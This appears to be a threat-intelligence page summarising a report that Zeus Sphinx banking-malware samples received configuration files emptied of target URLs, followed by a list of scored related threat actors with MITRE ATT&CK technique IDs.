Zeus Sphinx Pushes Empty Configuration Files
概要
Recent Zeus Sphinx samples have fetched configuration files in which all the target URLs were removed. This means that while Sphinx infection campaigns continue and the malware can infect new machines, it remains idle and lacks attack instructions to target specific banks and banking services.
The only instruction that repeats in all Sphinx configuration is to inject a victim’s “bot ID” into every page he or she visits. In essence, this is a web injection attack: Inject into http*://*, covering any HTTP and HTTPS webpage the victim browses to.
This phase of empty Sphinx configuration files started in March 2017 and increased over the past few months to include all Sphinx samples. This suggests that Sphinx is presently operated by one group, not multiple actors, despite the fact that it was commercially sold in the underground when it was launched in 2015.
Created: 2026-02-23
Indicators
Indicatorsは見つかっていない。
類似Pulses
このPulseに関連する脅威アクター (事実ベース)
Score: 5.36
Matched TTPs:
- T1684 - Social Engineering
- T1199 - Trusted Relationship
- T1537 - Transfer Data to Cloud Account
MITREへのリンク →
Score: 3.31
Matched TTPs:
- T1684 - Social Engineering
- T1199 - Trusted Relationship
MITREへのリンク →
Score: 3.31
Matched TTPs:
- T1684 - Social Engineering
- T1199 - Trusted Relationship
MITREへのリンク →
Score: 10.37
Matched TTPs:
- T1684 - Social Engineering
- T1567.001 - Exfiltration to Code Repository
- T1199 - Trusted Relationship
- T1587 - Develop Capabilities
MITREへのリンク →
Score: 8.51
Matched TTPs:
- T1684 - Social Engineering
- T1199 - Trusted Relationship
- T1537 - Transfer Data to Cloud Account
- T1546.017 - Udev Rules
MITREへのリンク →
Score: 6.24
Matched TTPs:
- T1684 - Social Engineering
- T1199 - Trusted Relationship
- T1573 - Encrypted Channel
MITREへのリンク →
Score: 8.65
Matched TTPs:
- T1684 - Social Engineering
- T1199 - Trusted Relationship
- T1537 - Transfer Data to Cloud Account
- T1008 - Fallback Channels
MITREへのリンク →
Score: 7.00
Matched TTPs:
- T1684 - Social Engineering
- T1686 - Disable or Modify System Firewall
MITREへのリンク →
Score: 10.30
Matched TTPs:
- T1684 - Social Engineering
- T1562.010 - Downgrade Attack
- T1199 - Trusted Relationship
- T1546.017 - Udev Rules
MITREへのリンク →
Score: 6.30
Matched TTPs:
- T1684 - Social Engineering
- T1562.010 - Downgrade Attack
MITREへのリンク →
Score: 11.57
Matched TTPs:
- T1684 - Social Engineering
- T1199 - Trusted Relationship
- T1573 - Encrypted Channel
- T1537 - Transfer Data to Cloud Account
- T1008 - Fallback Channels
MITREへのリンク →
Score: 6.24
Matched TTPs:
- T1684 - Social Engineering
- T1199 - Trusted Relationship
- T1587 - Develop Capabilities
MITREへのリンク →
Score: 7.22
Matched TTPs:
- T1562.010 - Downgrade Attack
- T1199 - Trusted Relationship
- T1547.008 - LSASS Driver
MITREへのリンク →
Score: 4.98
Matched TTPs:
- T1567.001 - Exfiltration to Code Repository
- T1199 - Trusted Relationship
MITREへのリンク →
Score: 18.35
Matched TTPs:
- T1556.008 - Network Provider DLL
- T1199 - Trusted Relationship
- T1218.009 - Regsvcs/Regasm
- T1555.004 - Windows Credential Manager
- T1537 - Transfer Data to Cloud Account
- T1547.008 - LSASS Driver
MITREへのリンク →
Score: 4.69
Matched TTPs:
- T1556.008 - Network Provider DLL
- T1199 - Trusted Relationship
MITREへのリンク →
Score: 4.69
Matched TTPs:
- T1556.008 - Network Provider DLL
- T1199 - Trusted Relationship
MITREへのリンク →
Score: 3.37
Matched TTPs:
- T1199 - Trusted Relationship
- T1547.008 - LSASS Driver
MITREへのリンク →
Score: 7.44
Matched TTPs:
- T1199 - Trusted Relationship
- T1537 - Transfer Data to Cloud Account
- T1094 - Custom Command and Control Protocol
MITREへのリンク →
Score: 3.37
Matched TTPs:
- T1199 - Trusted Relationship
- T1547.008 - LSASS Driver
MITREへのリンク →
Score: 4.13
Matched TTPs:
- T1199 - Trusted Relationship
- T1008 - Fallback Channels
MITREへのリンク →
Score: 5.83
Matched TTPs:
- T1199 - Trusted Relationship
- T1537 - Transfer Data to Cloud Account
- T1587 - Develop Capabilities
MITREへのリンク →
Score: 3.78
Matched TTPs:
- T1199 - Trusted Relationship
- T1587 - Develop Capabilities
MITREへのリンク →
Score: 7.91
Matched TTPs:
- T1199 - Trusted Relationship
- T1592.002 - Software
- T1547.008 - LSASS Driver
MITREへのリンク →
Score: 3.37
Matched TTPs:
- T1199 - Trusted Relationship
- T1547.008 - LSASS Driver
MITREへのリンク →
Score: 3.78
Matched TTPs:
- T1199 - Trusted Relationship
- T1573 - Encrypted Channel
MITREへのリンク →
Score: 6.19
Matched TTPs:
- T1199 - Trusted Relationship
- T1537 - Transfer Data to Cloud Account
- T1008 - Fallback Channels
MITREへのリンク →
Score: 3.78
Matched TTPs:
- T1199 - Trusted Relationship
- T1573 - Encrypted Channel
MITREへのリンク →
Score: 4.98
Matched TTPs:
- T1199 - Trusted Relationship
- T1055.005 - Thread Local Storage
MITREへのリンク →
Score: 8.98
Matched TTPs:
- T1199 - Trusted Relationship
- T1573 - Encrypted Channel
- T1537 - Transfer Data to Cloud Account
- T1546.017 - Udev Rules
MITREへのリンク →
Score: 10.43
Matched TTPs:
- T1199 - Trusted Relationship
- T1055.005 - Thread Local Storage
- T1587 - Develop Capabilities
- T1547.008 - LSASS Driver
MITREへのリンク →
Score: 3.78
Matched TTPs:
- T1199 - Trusted Relationship
- T1573 - Encrypted Channel
MITREへのリンク →
Score: 5.45
Matched TTPs:
- T1573 - Encrypted Channel
- T1547.008 - LSASS Driver
MITREへのリンク →
Score: 4.58
Matched TTPs:
- T1537 - Transfer Data to Cloud Account
- T1547.008 - LSASS Driver
MITREへのリンク →
Score: 5.34
Matched TTPs:
- T1537 - Transfer Data to Cloud Account
- T1008 - Fallback Channels
MITREへのリンク →
Score: 6.08
Matched TTPs:
- T1587 - Develop Capabilities
- T1546.017 - Udev Rules
MITREへのリンク →
Score: 3.29
Matched TTPs:
- T1008 - Fallback Channels
MITREへのリンク →
このPulseに関連する脅威アクター (推論ベース)
Score: 0.79
Matched TTPs:
- T1555.004 - Windows Credential Manager
- T1199 - Trusted Relationship
- T1537 - Transfer Data to Cloud Account
- T1218.009 - Regsvcs/Regasm
- T1556.008 - Network Provider DLL
- T1547.008 - LSASS Driver
MITREへのリンク →
Related CVEs
このPulseに見つかったCVEはありません。
Pulse – 脅威アクター グラフ
← Pulse一覧に戻る
Trusted Design